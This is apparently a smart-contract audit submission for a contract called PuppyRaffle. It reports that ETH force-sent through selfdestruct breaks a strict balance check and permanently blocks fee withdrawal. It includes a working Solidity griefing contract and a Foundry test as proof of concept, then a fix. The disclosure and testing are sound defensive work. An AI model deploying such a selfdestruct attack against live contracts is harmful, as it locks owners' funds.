Submission Details
Severity:
Can't withdraw fees if malicious attacker send PuppyRaffle ETH by selfdestruct
Summary
Can't withdraw fees if malicious attacker send PuppyRaffle ETH by selfdestruct
Vulnerability Details
If malicious attacker send PuppyRaffle ETH by selfdestruct, the address(this).balance == uint256(totalFees) will always be invalid. The withdrawFees() function will always revert.
Impact
The fees can't withdraw and will be locked in the contract
Tools Used
manual
foundry
POC
contract SelfDestructAttack {
constructor(address _addr) payable {
selfdestruct(payable(_addr));
}
}
function testCanNotWithdrawFees() public playersEntered {
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
puppyRaffle.selectWinner();
new SelfDestructAttack{value:entranceFee}(address(puppyRaffle));
vm.expectRevert("PuppyRaffle: There are currently players active!");
puppyRaffle.withdrawFees();
}
Recommendations
It is suggested to replace with require(address(this).balance >= uint256(totalFees), "PuppyRaffle: There are currently players active!");
Updates
Lead Judging Commences
Hamiltonite about 2 years ago
Submission Judgement Published Assigned finding tags:
greifers-send-money-to-contract-to-block-withdrawfees
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.